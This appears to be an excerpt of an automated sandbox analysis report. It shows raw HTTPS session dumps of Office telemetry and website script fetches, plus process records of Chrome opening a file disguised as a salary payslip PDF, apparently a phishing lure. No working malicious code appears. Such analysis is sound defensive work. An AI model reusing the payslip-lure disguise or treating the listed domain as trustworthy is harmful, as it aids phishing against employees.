                                                                                                                      Data Ascii: W#Zpg/6y[=Bgh&O`R68$o0-~g:D=~5WT6eI7LxZNaHI,y9nSsCP"YV|@$_>[Gx)8I$m0Io@ueKH<Z&";%VJy)x6n~vy9}_L2)YVE)"
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 3e 18 f6 87 28 d2 48 42 ee 15 72 e5 15 e4 e0 10 da 0a d7 41 a4 98 76 72 25 ff 57 92 bc c1 0e 19 ce 3c aa 46 12 82 09 0a 44 27 9f e3 3d ee f4 96 b2 c3 7c 95 2c f1 cc 6c 7c 51 13 55 ad 4d 31 f5 3d 0c a7 d4 48 ed e8 69 1d ed 8c da 26 bc 93 5b 34 3b 8d 15 b0 28 5f 21 69 19 51 65 ed be bb 64 42 11 5d 80 cc a0 d2 24 1d f4 7a 70 80 83 30 68 8a 1c 61 3d 10 c0 98 73 2b 28 9e 71 ec 94 c5 50 a4 48 cf b3 48 94 14 92 60 8d 88 76 64 89 93 f8 57 c5 51 48 bc 94 c4 47 6f 70 92 52 4b 5c 23 b7 9c 51 c5 45 2b ae 81 93 ef 92 d4 5f a8 f8 d1 4e 70 c2 0b 78 59 b3 3c 29 cf 8e ad 9d 2b cc 66 70 4d e6 71 0c b7 0b 14 84 78 2c d3 64 3c 1c 35 01 d4 f6 8a 3a 37 84 06 c3 e3 af d1 93 97 04 e8 e9 3b 5a 2b b4 41 83 5f a7 0d 9b 16 ae d6 33 6d 4c 32 ac 55 09 d6 8b 7c a3 ae 6f 8a 6e c9 97 1a
                                                                                                                      Data Ascii: >(HBrAvr%W<FD'=|,l|QUM1=Hi&[4;(_!iQedB]$zp0ha=s+(qPHH`vdWQHGopRK\#QE+_NpxY<)+fpMqx,d<5:7;Z+A_3mL2U|on
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 24 9e c2 91 52 56 a3 45 0f 92 3d f5 ea 99 17 c8 cf 6d a8 dc 32 26 c6 b4 97 e4 b2 f3 64 d0 fa fb 2d ac d8 28 90 9a 3e 54 8b 49 91 b8 4b 8b 3f 32 31 bc 1c e6 e3 eb 26 4f 0b e4 87 1b c3 43 2e 6e be eb 3d 2a 8b 2c cf 29 b3 1c ba 28 38 1f 7a 08 05 f5 b4 87 31 6c 69 c1 f6 86 69 39 09 cb c2 4d a4 de 29 92 dc 15 e9 54 a0 00 bf 56 d8 a5 45 b2 ce 67 82 e8 c5 9a a5 4b af aa 29 b2 02 5e 41 51 14 90 5e 02 3f cc 8b 14 7e 41 6f 9c c3 ff 8b a0 fa 8c 8b 34 c7 7e 8a a8 84 ba a8 ce 58 8e 34 46 cf 0b d2 e4 ec e4 24 08 c3 8d 8d cd 22 4f b8 53 e7 47 0f 02 78 3e 93 eb da 34 4e ad 29 67 99 8f d2 7e 6a 40 6d 1c c6 3a 73 53 d5 f1 d0 cd 34 ab c3 0b f1 86 a9 55 b8 27 c7 bb 17 13 37 f1 ad cc 7c 13 3d f3 70 d2 8b ba d1 d9 ce 2e 4b eb f2 e1 7d ff fa 6d db 1f 32 ac 57 71 10 6d f7 47 b3
                                                                                                                      Data Ascii: $RVE=m2&d-(>TIK?21&OC.n=*,)(8z1lii9M)TVEgK)^AQ^?~Ao4~X4F$"OSGx>4N)g~j@m:sS4U'7|=p.K}m2WqmG
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 98 86 a7 76 4e 4c 3e 85 c7 5c 1f 6b 6b 80 2e 23 41 93 96 4d b1 32 fb 82 63 71 74 7f 1f 5a ae d1 e6 25 db 73 aa 28 91 65 ca 64 41 ae 66 8c 50 56 92 63 dd e5 78 61 0f 17 a7 79 56 34 95 ad 9a fe c6 18 2a 9c 68 3a cd 95 9d ba 50 b9 d8 28 28 45 6b e3 cb 97 ae 7e ec c7 3e 2b 92 53 88 da c8 0d ee c7 07 af fd af ff fb fb 6e 5e 61 8b a9 8c 93 fd c7 27 79 ad dd af 0c fd 10 a7 b6 6d 24 ca 46 75 f5 82 ed 5a 51 a1 7e e5 37 fe e1 37 be f1 87 ff e3 7f ff 8f 94 2a c7 81 03 55 0a 14 a2 68 fc a9 8c 9b 3b ef 58 22 2b 3b 37 c2 12 b3 4f fc cc 2f 7d f0 63 1f b7 c8 d2 a5 2e 8a ef be fa 0a ca 31 5a 16 54 b4 a8 3b 82 c5 aa 98 9f 9d 06 bd 1e 9c d5 d0 77 27 e3 91 63 bb 48 8a 27 90 1d 04 b8 b0 84 f1 24 33 0b 73 f3 51 6a be 84 6e 8c 29 26 6b c7 f1 e7 f3 39 a9 4c 43 3d e7 43 95 9b a7
                                                                                                                      Data Ascii: vNL>\kk.#AM2cqtZ%s(edAfPVcxayV4*h:P((Ek~>+Sn^a'ym$FuZQ~77*Uh;X"+;7O/}c.1ZT;w'cH'$3sQjn)&k9LC=C
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 6c d7 b8 77 b8 ae d5 cd 64 d3 59 63 56 54 5b a1 66 fd 90 30 80 d3 60 b6 e4 ca ad 04 23 2a 48 6e ee 40 53 68 d1 6c 89 5d 4f 4f 00 ec f0 c5 a6 d7 a0 0e 31 42 60 0a 16 bd 70 e8 f9 75 b7 43 85 49 32 ad 16 10 0e 47 24 2b 11 46 d9 91 0b 64 2c ed 31 47 da d8 04 2b ef d2 e3 97 e8 96 02 91 09 a9 1c 65 db f0 fb 8c 2b 4a ff 82 cb 3b 97 e7 73 f8 18 d1 87 ce b2 94 3e 2e 9d 71 f8 27 01 08 1b 50 cd 82 a8 05 31 70 97 cb 73 ae 48 19 9f c4 a8 d0 42 28 ee df 7f f5 fb df fa e6 b7 9e 78 ec d1 9d cb 97 e8 80 8e ea fa ec d9 b3 4f 3e f1 04 6d dc 3f ff b3 ff f4 ad 97 bf f9 ec fb 9e fb e8 f3 1f b8 7d 1d 2e ad 74 f3 2a 56 ba 0a 00 9b 2d 55 0d 82 cd ec 74 36 9a 6c d2 e1 03 3c 9c ad 86 4b d6 0b ac d8 e8 c8 e7 3e ce 99 33 67 e8 8f f2 dc bc a2 9c 79 3a 9d 53 2a 3e 9b 2f 46 5e 18 83 56
                                                                                                                      Data Ascii: lwdYcVT[f0`#*Hn@Shl]OO1B`puCI2G$+Fd,1G+e+J;s>.q'P1psHB(xO>m?}.t*V-Ut6l<K>3gy:S*>/F^V
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 3a fa 8c 38 13 be 81 c6 40 08 e4 6a ad 4d 5a 67 14 12 94 1b 74 7a cf 7f e9 17 5e 1f 8f df f8 0f bf 33 a4 54 99 91 cf 10 52 4f 8a da 47 89 05 e6 b0 ef 16 4e 0a 8f 35 5d 61 03 b9 3e 63 88 29 9d 2e 2b ce 2b e3 5c 2f 6b 15 87 d1 e7 7f f9 bf a1 60 85 3e 29 f3 35 d6 ad 08 2b 69 56 31 ed c4 69 4c e8 94 18 09 71 c5 c3 c2 17 2e ef 45 07 a3 c4 4a b9 8d 6d b9 d2 2b 35 fe da d6 25 e6 a9 1a b5 6a be 20 0c b7 91 5f b4 6e 52 4c 94 e3 88 ff d2 fd 06 5f 2f 00 8c 09 83 46 77 dd 7b 8d c7 51 26 9a 7b dd 76 8f 0a 87 fb 07 fb 6b a6 4f a6 87 74 ee da 33 db 57 be f5 e0 fa 9b 1e fc 2b 0b 4a 7e b3 82 15 b0 50 bb fa 54 36 c2 7c 5c 9b 67 e1 f0 70 82 3d 2f 74 6d bd e1 2a d1 24 e1 66 06 9d 2f ba ab 28 55 38 be 7b 40 05 6d 34 e8 d0 56 a4 cd 4c 95 1b c5 06 28 67 30 b8 42 46 d6 ac 68 c7
                                                                                                                      Data Ascii: :8@jMZgtz^3TROGN5]a>c).++\/k`>)5+iV1iLq.EJm+5%j _nRL_/Fw{Q&{vkOt3W+J~PT6|\gp=/tm*$f/(U8{@m4VL(g0BFh
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: ce b5 c2 d0 3a ed 34 d0 50 91 30 92 69 9c 24 99 50 b4 a9 a9 40 f0 3d a6 d7 d1 be f7 6d 6f db 55 96 b5 df 9c 58 b9 8d a5 28 b5 f7 57 d3 2b d4 4a e8 a9 2e a7 b9 e6 97 38 9f 3b 42 76 b5 12 49 66 1b 7b 0f 77 29 e5 9f 5a 7e 6b d8 ed 9c 2e 96 d6 e8 bc ae 57 f2 a4 cd 68 4b 3d f5 e1 0f dd fe e1 1b df f9 b3 3f ad 67 b0 5d c3 f8 09 93 b4 52 f4 32 9a 16 27 c5 3e fa 69 16 6b 74 c4 c9 89 95 1f bd ce c6 d6 67 7f ed cb 48 43 c0 22 d2 77 6e be 7d bc bf db 81 e9 93 67 2a 61 ba bf da e1 93 4f 3d b1 bf 7f b8 bf 7f 50 30 42 6a 0d cc 8f 2b 12 17 31 eb 5b d2 eb 53 c0 49 71 a4 59 97 37 67 26 2f 03 ac e8 12 60 05 80 52 f4 0a 78 15 6a e1 b1 35 d3 7e aa a3 9b 99 e8 5f ff f4 a7 46 b0 c6 2a 5c 53 cc 68 76 57 e1 4e 2f 17 c0 9c 3b 78 3c ea ab 64 52 50 15 da b0 af c0 60 2f 94 91 f2 30
                                                                                                                      Data Ascii: :4P0i$P@=moUX(W+J.8;BvIf{w)Z~k.WhK=?g]R2'>iktgHC"wn}g*aO=P0Bj+1[SIqY7g&/`Rxj5~_F*\ShvWN/;x<dRP`/0
                                                                                                                      2024-12-03 07:55:29 UTC8000INData Raw: 92 d5 fb 1b ef 7d fb 7b bf fa db bf 85 9d aa 38 2e c8 c8 96 1b 6c b5 c0 bb 3c 7e f9 f3 bf fc d3 c5 78 88 b4 38 32 af 41 41 b9 38 85 83 3f 45 32 b0 c9 73 91 43 c0 fa 9e 6a 03 63 31 2a 88 18 f7 bc 66 b3 15 46 61 b2 48 0e 5e ef 7f f6 e9 67 be 17 bc f3 ee fd 7b f7 de e9 a3 76 ac 19 8d 86 09 f1 8a a1 82 ee 62 41 5b 6e ac 75 77 ae 6c ce 67 53 b8 e6 78 3e 31 45 46 d2 17 f2 82 dd ee da da 46 ff e2 e2 22 0a 43 48 cb 67 b3 b9 62 e3 19 6a eb 43 8e 50 af d5 60 2f 43 c6 70 7c 78 b0 b9 b9 95 92 41 04 d3 8b 45 ae c1 20 89 aa cc 59 da 56 4a 1c 3c 8d 68 27 53 f1 8e 25 73 61 47 52 86 95 5a 69 2b 17 86 83 ae cc fc d9 5e c3 70 53 13 2d 9b 1d cf 0b e3 ac 78 fe fa 10 e1 9c 95 6f 09 1a 93 f9 dc 56 21 c1 1f ad 98 18 46 dc 3d c6 53 51 22 80 7a 0c 70 7a b5 5b 8d 5e a7 de ae bb ee
                                                                                                                      Data Ascii: }{8.l<~x82AA8?E2sCjc1*fFaH^g{vbA[nuwlgSx>1EFF"CHgbjCP`/Cp|xAE YVJ<h'S%saGRZi+^pS-xoV!F=SQ"zpz[^


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      144192.168.2.44990813.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:29 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:29 UTC470INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:29 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 501
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                      ETag: "0x8DC582BACFDAACD"
                                                                                                                      x-ms-request-id: 4c7796e8-801e-0083-47a6-43f0ae000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075529Z-174f78459685726chC1EWRsnbg00000015u00000000005d0
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:29 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      145192.168.2.44990913.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:29 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:30 UTC494INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:29 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 2592
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                                      x-ms-request-id: db283756-601e-0070-61b4-43a0c9000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075529Z-174f7845968xr5c2hC1EWRd0hn0000000qc000000000b1q6
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:30 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      146192.168.2.44991113.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:29 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:30 UTC494INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:30 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 2284
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                                      x-ms-request-id: 49e8a97e-c01e-008e-5491-3f7381000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075530Z-174f7845968xr5c2hC1EWRd0hn0000000qm0000000000wem
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:30 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      147192.168.2.44991013.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:29 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:30 UTC494INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:30 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 3342
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                                      x-ms-request-id: 6eac8613-a01e-006f-3091-3f13cd000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075530Z-174f7845968kdththC1EWRzvxn0000000k2000000000226g
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:30 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      148192.168.2.449915196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:30 UTC603OUTGET /wp-content/themes/salient/js/build/third-party/jquery.mousewheel.min.js?ver=3.1.13 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:31 UTC295INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:30 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:30 GMT
                                                                                                                      ETag: "a97-5eed4eec63d80"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 2711
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: application/javascript
                                                                                                                      2024-12-03 07:55:31 UTC2711INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 4d 6f 75 73 65 77 68 65 65 6c 20 33 2e 31 2e 31 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 65 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 3a 65 28 6a 51 75 65 72 79 29 7d 28 66 75 6e 63 74 69 6f 6e 28 75 29 7b 76 61 72 20 66 2c 64 2c 65 3d 5b 22 77 68 65 65 6c 22 2c 22 6d 6f 75 73 65 77 68 65
                                                                                                                      Data Ascii: /*! * jQuery Mousewheel 3.1.13 * Copyright OpenJS Foundation and other contributors */!function(e){"function"==typeof define&&define.amd?define(["jquery"],e):"object"==typeof exports?module.exports=e:e(jQuery)}(function(u){var f,d,e=["wheel","mousewhe


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      149192.168.2.44991813.107.246.63443
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:30 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Accept-Encoding: gzip
                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                      2024-12-03 07:55:31 UTC494INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:31 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 1393
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                                      x-ms-request-id: 68f80354-c01e-002b-0bf2-446e00000000
                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                      x-azure-ref: 20241203T075531Z-174f7845968kdththC1EWRzvxn0000000k3g0000000002py
                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                      X-Cache: TCP_HIT
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      2024-12-03 07:55:31 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Click to jump to process

                                                                                                                      Target ID:0
                                                                                                                      Start time:02:53:56
                                                                                                                      Start date:03/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Itnaledi Salary_ Payslip _ Updates4C79949D7C31_pdf.html"
                                                                                                                      Imagebase:0x7ff76e190000
                                                                                                                      File size:3'242'272 bytes
                                                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Target ID:2
                                                                                                                      Start time:02:53:58
                                                                                                                      Start date:03/12/2024
                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      Wow64 process (32bit):false
